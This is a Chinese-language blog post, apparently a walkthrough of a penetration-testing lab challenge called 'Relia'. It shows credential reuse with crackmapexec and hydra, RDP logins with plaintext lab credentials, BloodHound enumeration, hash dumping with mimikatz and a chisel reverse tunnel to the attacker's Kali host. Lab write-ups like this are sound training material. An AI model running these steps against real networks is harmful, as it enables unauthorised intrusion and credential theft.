Challenge 2 - Relia(7)
Challenge 2 - Relia(7)
下一台回到面對外網的 .191 機器,如下表
上一章在內網的 172.16.xxx.14 機器上發現 Keepass 的資料庫 Database.kdbx
從中獲取到一個帳號密碼 dmzadmin:SlimGodhoodMope
透過 crackmapexec 密碼噴灑發現這個憑證是 .191 的有效憑證,本機帳號不是網域帳號
進行 Rustscan 看看 .191 有開哪些對外的 Port,可以看到有 3389
hydra 測試 .191 RDP 發現該組憑證是可以透過 RDP 登入的
RDP 登入,└─$ xfreerdp /u:dmzadmin /p:SlimGodhoodMope /v:192.168.212.191 -drive:lab2,/home/kali/lab2/191,桌面上就有 flag proof.txt,這一台沒有 local.txt
看了一下這個帳號隸屬 .191 Administrators 群組,但 crackmapexec 測試時沒有顯示
下一步將網域帳號 jim@relia.com:Castello1! 加到 .191 的本機管理者群組
然後改使用網域帳號 jim RDP 登入到 .191,└─$ xfreerdp /u:jim@relia.com /p:'Castello1!' /v:192.168.212.191 -drive:lab2,/home/kali/lab2/191
更新攻擊順序表並將雙網卡資訊紀錄上去,這一台看來充當內網對外的 Router
拿下有加入網域的機器接著跑 BloodHound 是基本的枚舉,上一章拿下內網的 .14 沒有跑
是因為提權沒有成功(但是沒有影響),加上內網要傳檔案較麻煩要搭建 chisel
所以將 BloodHound 放到 .191 來跑,將相關工具上傳然後執行 Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Users\jim\Desktop\ -OutputPrefix "relia"
執行 BloodHound 後先查一下 Domain Admins 有三個,dan、internaladmin、administrator
將使用者帳號 jim,電腦帳號 login Mark 成 Owned 繼續查看相關攻擊路徑,但沒有新發現
現有使用者 jim 是個一般使用者沒有甚麼特殊權限
開始先將內網的機器與資訊收集完整
.6 --> DC02
.7 --> INTRANET
.15 --> WK02
.21 --> FILES
.30 --> WEBBY
.189 --> MAIL
.19 & .20 依據 TTL 看來是 Linux,且沒有名稱解析
先將攻擊順序表更新如下
在 .191 繼續枚舉,mimikatz.exe 收集 dmzadmin HASH
.191 Administrator HASH
更新帳號密碼表
目前看來拿下 .191 後沒有特別的進一步資訊,最後搭建 chisel 回到 kali
然後繼續網內網其他機器查看,這一章到此告一段落
wmic process call create "C:\users\jim\desktop\chisel.exe client 192.168.45.221:8080 R:socks"
留言
張貼留言